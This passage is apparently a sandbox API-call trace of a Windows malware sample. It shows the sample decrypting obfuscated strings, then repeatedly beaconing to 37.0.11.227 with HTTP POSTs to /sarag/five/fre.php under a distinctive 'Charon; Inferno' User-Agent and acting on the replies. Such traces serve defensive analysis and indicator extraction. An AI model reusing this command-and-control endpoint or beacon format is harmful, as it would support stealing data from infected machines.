ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0299.576] GetProcessHeap () returned 0x690000 [0299.576] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab4d0 [0299.576] socket (af=2, type=1, protocol=6) returned 0x9dc [0299.577] connect (s=0x9dc, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0299.606] FreeAddrInfoW (pAddrInfo=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0299.606] GetProcessHeap () returned 0x690000 [0299.606] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6af078 [0299.606] GetProcessHeap () returned 0x690000 [0299.606] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b97c0 [0299.607] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0299.608] wvsprintfA (in: param_1=0x6b97c0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0299.608] GetProcessHeap () returned 0x690000 [0299.608] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6af440 [0299.608] GetProcessHeap () returned 0x690000 [0299.609] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0299.609] GetProcessHeap () returned 0x690000 [0299.609] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4730 [0299.609] GetProcessHeap () returned 0x690000 [0299.609] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b97c0 [0299.609] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0299.610] wvsprintfA (in: param_1=0x6b97c0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0299.610] GetProcessHeap () returned 0x690000 [0299.610] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0299.610] GetProcessHeap () returned 0x690000 [0299.611] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0299.611] send (s=0x9dc, buf=0x6ad508*, len=242, flags=0) returned 242 [0299.611] send (s=0x9dc, buf=0x6aba40*, len=159, flags=0) returned 159 [0299.611] GetProcessHeap () returned 0x690000 [0299.611] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0299.611] recv (in: s=0x9dc, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0299.690] GetProcessHeap () returned 0x690000 [0299.690] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0299.691] GetProcessHeap () returned 0x690000 [0299.691] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0299.693] GetProcessHeap () returned 0x690000 [0299.693] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af440 | out: hHeap=0x690000) returned 1 [0299.694] GetProcessHeap () returned 0x690000 [0299.694] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af078 | out: hHeap=0x690000) returned 1 [0299.694] closesocket (s=0x9dc) returned 0 [0299.695] GetProcessHeap () returned 0x690000 [0299.696] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab4d0 | out: hHeap=0x690000) returned 1 [0299.696] GetProcessHeap () returned 0x690000 [0299.696] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0299.696] GetProcessHeap () returned 0x690000 [0299.697] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0299.697] GetProcessHeap () returned 0x690000 [0299.697] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0299.698] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x734) returned 0x9dc [0299.706] Sleep (dwMilliseconds=0xea60) [0299.707] GetProcessHeap () returned 0x690000 [0299.707] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4418 [0299.708] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0299.709] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0299.715] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0299.716] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0299.720] GetProcessHeap () returned 0x690000 [0299.720] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8970 [0299.721] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0299.721] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8970, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d028) returned 1 [0299.722] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0299.723] CryptSetKeyParam (hKey=0x69d028, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0299.724] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0299.724] CryptSetKeyParam (hKey=0x69d028, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0299.724] GetProcessHeap () returned 0x690000 [0299.724] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8970 | out: hHeap=0x690000) returned 1 [0299.731] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0299.731] CryptDecrypt (in: hKey=0x69d028, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4418, pdwDataLen=0x19fcfc | out: pbData=0x6a4418, pdwDataLen=0x19fcfc) returned 1 [0299.732] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0299.732] CryptDestroyKey (hKey=0x69d028) returned 1 [0299.733] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0299.734] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0299.734] GetProcessHeap () returned 0x690000 [0299.734] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0299.734] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0299.736] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0299.737] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0299.737] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0299.738] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0299.738] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0299.739] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0299.739] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0299.739] GetProcessHeap () returned 0x690000 [0299.739] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0299.739] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0299.739] GetProcessHeap () returned 0x690000 [0299.740] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0299.740] GetProcessHeap () returned 0x690000 [0299.740] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0299.740] GetProcessHeap () returned 0x690000 [0299.740] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4418 | out: hHeap=0x690000) returned 1 [0299.741] GetProcessHeap () returned 0x690000 [0299.741] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0299.741] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0299.742] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0299.747] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0299.752] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0299.762] GetProcessHeap () returned 0x690000 [0299.762] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0299.763] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0299.763] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0299.764] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0299.764] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0299.765] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0299.765] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0299.765] GetProcessHeap () returned 0x690000 [0299.765] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0299.766] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0299.766] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0299.780] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0299.782] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0299.783] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0299.783] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0299.783] GetProcessHeap () returned 0x690000 [0299.783] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0299.784] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0299.784] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0299.785] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0299.785] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0299.786] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0299.786] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0299.787] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0299.788] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0299.788] GetProcessHeap () returned 0x690000 [0299.788] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0299.788] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0299.788] GetProcessHeap () returned 0x690000 [0299.788] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab480 [0299.788] socket (af=2, type=1, protocol=6) returned 0x9e0 [0299.788] connect (s=0x9e0, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0299.817] FreeAddrInfoW (pAddrInfo=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0299.817] GetProcessHeap () returned 0x690000 [0299.817] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0299.817] GetProcessHeap () returned 0x690000 [0299.817] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b97c0 [0299.818] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0299.820] wvsprintfA (in: param_1=0x6b97c0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0299.820] GetProcessHeap () returned 0x690000 [0299.820] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afd40 [0299.820] GetProcessHeap () returned 0x690000 [0299.821] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0299.821] GetProcessHeap () returned 0x690000 [0299.821] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4340 [0299.821] GetProcessHeap () returned 0x690000 [0299.821] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b97c0 [0299.821] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0299.822] wvsprintfA (in: param_1=0x6b97c0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0299.822] GetProcessHeap () returned 0x690000 [0299.822] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0299.822] GetProcessHeap () returned 0x690000 [0299.823] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0299.823] send (s=0x9e0, buf=0x6ad508*, len=242, flags=0) returned 242 [0299.823] send (s=0x9e0, buf=0x6aba40*, len=159, flags=0) returned 159 [0299.823] GetProcessHeap () returned 0x690000 [0299.823] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0299.823] recv (in: s=0x9e0, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0299.898] GetProcessHeap () returned 0x690000 [0299.898] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0299.898] GetProcessHeap () returned 0x690000 [0299.899] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0299.899] GetProcessHeap () returned 0x690000 [0299.899] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afd40 | out: hHeap=0x690000) returned 1 [0299.899] GetProcessHeap () returned 0x690000 [0299.899] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0299.899] closesocket (s=0x9e0) returned 0 [0299.900] GetProcessHeap () returned 0x690000 [0299.900] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab480 | out: hHeap=0x690000) returned 1 [0299.900] GetProcessHeap () returned 0x690000 [0299.900] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0299.901] GetProcessHeap () returned 0x690000 [0299.901] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0299.901] GetProcessHeap () returned 0x690000 [0299.901] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0299.901] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x13b8) returned 0x9e0 [0299.903] Sleep (dwMilliseconds=0xea60) [0299.904] GetProcessHeap () returned 0x690000 [0299.904] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0299.905] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0299.905] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0299.911] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0299.911] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0299.916] GetProcessHeap () returned 0x690000 [0299.916] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0299.917] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0299.917] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfe8) returned 1 [0299.918] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0299.918] CryptSetKeyParam (hKey=0x69cfe8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0299.918] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0299.919] CryptSetKeyParam (hKey=0x69cfe8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0299.919] GetProcessHeap () returned 0x690000 [0299.919] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0299.920] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0299.920] CryptDecrypt (in: hKey=0x69cfe8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0299.921] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0299.921] CryptDestroyKey (hKey=0x69cfe8) returned 1 [0299.921] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0299.922] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0299.922] GetProcessHeap () returned 0x690000 [0299.922] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0299.922] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0299.923] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0299.923] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0299.923] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0299.924] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0299.925] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0299.925] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0299.926] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0299.926] GetProcessHeap () returned 0x690000 [0299.926] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0299.926] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0299.926] GetProcessHeap () returned 0x690000 [0299.926] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0299.926] GetProcessHeap () returned 0x690000 [0299.927] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0299.927] GetProcessHeap () returned 0x690000 [0299.927] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0299.927] GetProcessHeap () returned 0x690000 [0299.927] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0299.928] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0299.928] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0299.934] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0299.935] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aee58) returned 1 [0299.939] GetProcessHeap () returned 0x690000 [0299.939] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0299.940] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0299.940] CryptImportKey (in: hProv=0x6aee58, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0299.941] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0299.942] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0299.943] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0299.943] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0299.943] GetProcessHeap () returned 0x690000 [0299.944] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0299.944] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0299.945] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0299.945] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0299.945] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0299.946] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0299.946] CryptReleaseContext (hProv=0x6aee58, dwFlags=0x0) returned 1 [0299.946] GetProcessHeap () returned 0x690000 [0299.946] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0299.947] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0299.947] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0299.948] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0299.948] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0299.948] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0299.949] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0299.949] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0299.949] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0299.949] GetProcessHeap () returned 0x690000 [0299.949] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0299.949] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a3088*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb68*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0299.950] GetProcessHeap () returned 0x690000 [0299.950] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab3e0 [0299.950] socket (af=2, type=1, protocol=6) returned 0x9e4 [0299.950] connect (s=0x9e4, name=0x6aeb68*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0299.975] FreeAddrInfoW (pAddrInfo=0x6a3088*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb68*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0299.975] GetProcessHeap () returned 0x690000 [0299.975] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0299.975] GetProcessHeap () returned 0x690000 [0299.975] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b97c0 [0299.976] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0299.977] wvsprintfA (in: param_1=0x6b97c0, param_2="POST %s HTTP/1.0\r\nUser-Agent: 